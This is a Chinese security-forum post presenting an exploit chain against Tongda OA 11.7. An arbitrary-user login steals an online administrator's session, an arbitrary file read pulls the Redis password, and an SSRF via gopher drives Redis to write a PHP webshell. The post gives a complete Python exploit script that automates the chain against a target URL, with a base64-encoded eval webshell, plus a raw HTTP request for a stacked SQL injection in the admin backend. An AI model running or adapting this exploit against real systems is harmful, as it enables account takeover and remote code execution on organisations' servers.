安全矩阵

 找回密码
 立即注册
搜索
查看: 3146|回复: 0

通达OA11.7 利用新思路(附EXP)

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-3-6 09:11:55 | 显示全部楼层 |阅读模式
原文链接:通达OA11.7 利用新思路(附EXP)

前言

炒个冷饭。都是垃圾小洞组合在一起。
任意用户登陆+获取安装目录+任意文件读取+ssrf-->redis -->写入文件-->getshell

一、 通过任意用户登陆拿到管理员的cookie
二、获取安装目录读取redis 配置文件
三、 ssrf 写入文件
四、getshell

通过任意用户登陆拿到管理员的cookie

通达OA 任意用户登陆条件需要管理员在线
http://192.168.1.22/mobile/auth_ ... p;uid=1&P_VER=0
访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台

这里已经登陆了。打开无痕模式

如果他什么都没有返回,说明是OK的。那么就利用当前的phpsessid进行访问

如果出现RELOGIN那说明。管理员不在线漏洞形成的过程

这里查询了UID 是否在线。CLIENT 默认为0  这个0代表浏览器

这个表存的是当前用户的登陆信息。UID 和时间。sid 是phpssion 的值。然后client 是客户端标识符。

获取安装目录读取redis 配置文件

/general/approve_center/archive/getTableStruc.php

首先是任意文件读取
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2

读取到redis 密码。然后通过ssrf

/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/

完整exp

如下:
  1. # -*- coding:utf-8 -*-
  2. import os
  3. import requests
  4. import re
  5. # author :print("")
  6. import urllib




  7. class GenerateUrl:
  8.     def __init__(self, password, webroot, filename):
  9.         self.password = password
  10. self.webroot = webroot
  11. self.filename = filename
  12. self.webshell = '''
  13.         
  14. <?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>


  15. '''
  16.         self.template = '''_*2
  17. $4
  18. AUTH
  19. ${password_len}
  20. {password}
  21. *1
  22. $8
  23. flushall
  24. *4
  25. $6
  26. CONFIG
  27. $3
  28. SET
  29. $10
  30. dbfilename
  31. ${filename_len}
  32. {filename}
  33. *4
  34. $6
  35. CONFIG
  36. $3
  37. SET
  38. $3
  39. dir
  40. ${webroot_len}
  41. {webroot}
  42. *3
  43. $3
  44. SET
  45. $1
  46. 1
  47. ${content_len}
  48. {content}
  49. *1
  50. $4
  51. save
  52. *1
  53. $4
  54. quit


  55. '''
  56.     def __str__(self):
  57.         webshell = self.webshell
  58. webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
  59. webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace(
  60. '>', '%3e')
  61. self.template = self.template.replace("{password_len}", str(len(self.password)))
  62. self.template = self.template.replace("{password}", self.password)
  63. self.template = self.template.replace("{filename_len}", str(len(self.filename)))
  64. self.template = self.template.replace("{filename}", self.filename)
  65. self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
  66. self.template = self.template.replace("{webroot}", self.webroot)
  67. self.template = self.template.replace("{content_len}", str(len(self.webshell)))
  68. self.template = self.template.replace("{content}", webshell)
  69. self.template = self.template.replace('\n', '%0D%0A')
  70. return urllib.quote_plus(self.template)


  71. proxies = {
  72. "http": "http://127.0.0.1:8080",
  73. "https": "http://127.0.0.1:8080",
  74. }
  75. def headers(phpsesion):
  76.     return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
  77. "Cookie": phpsesion
  78. }



  79. # 获取绝对目录
  80. def get_path(url, headers):
  81.     urlc = url
  82. url = (url + '/general/approve_center/archive/getTableStruc.php')
  83. try:
  84.         data = requests.get(url=url, headers=headers, proxies=proxies).json()
  85. path = data['logPath'].split('\\')[0]
  86. url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path
  87. data2 = requests.get(url=url2, headers=headers, proxies=proxies)
  88. ress = re.search('requirepass .+', data2.text).group()
  89. return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}
  90. except:
  91.         exit('ERROR Cookie PHPSESSID expired')




  92. # ssrf写入文件
  93. def ssrf_webshell(url, path, password):
  94.     urlc = url
  95. path = path
  96. password = password
  97. a = GenerateUrl(password, path + "/webroot/", "666.php")
  98. url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))
  99. data = requests.get(url=url, headers=headers, proxies=proxies)
  100. ddd = requests.get(url=urlc + '/666.php')
  101. if ddd.status_code == 200:
  102.         print('shell url:%s' % urlc + '/666.php')
  103. else:
  104.         print('send shell ERROR')
  105. return True


  106. def get_cookie(url):
  107.     url =  url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
  108.     headers = {
  109. "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
  110. }
  111. try:
  112.         response = requests.get(url=url, headers=headers)
  113. if "RELOGIN" in response.text and response.status_code == 200:
  114.             exit("目标用户为离线状态")
  115. elif response.status_code == 200 and response.text == "":
  116.             print("好了马上就能getshell了")
  117. cookies = response.cookies
  118. cookie = requests.utils.dict_from_cookiejar(cookies)
  119. if   cookie['SESSIONID']:
  120.                 return cookie['SESSIONID']
  121. else:
  122.                 exit('实在抱歉,getshell不了')
  123. else:
  124.             print("未知错误,目标可能不存在或不存在该漏洞")
  125. except Exception as e:
  126.         exit('实在抱歉,getshell不了')


  127. if __name__ == '__main__':
  128.     import sys
  129. try:
  130.         url = sys.argv[1]
  131. cookie =get_cookie(url)
  132. headers = headers(cookie)
  133. root_path = get_path(url, headers)
  134. ssrf_webshell(url, root_path['path'], root_path['redis_pass'])
  135. except:
  136.         print('python tongda.py http://127.0.0.1')
复制代码

没有测试那个获取cookie 那个地方。这个需要如果测试中出现意外改改吧。纯演示思路


分享一个后台SQL 注入的点

这里支持堆叠注入。首先需要获取到通达OA的安装目录。然后into 写入shell 即可。=。=

  1. POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1
  2. Host:
  3. 10.211.55.5
  4. Content-Length: 39
  5. Accept: */*
  6. DNT: 1
  7. X-Requested-With: XMLHttpRequest
  8. UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar
  9. i/537.36
  10. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  11. Origin:
  12. http://10.211.55.5
  13. Referer:
  14. http://10.211.55.5/general/officeProduct/product_apply/index.php
  15. Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
  16. Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5
  17. ; SID_1=24205621
  18. Connection: close
  19. arr[5][pro_id]=151';select sleep(3) %23
复制代码


















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 00:51 , Processed in 0.015962 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表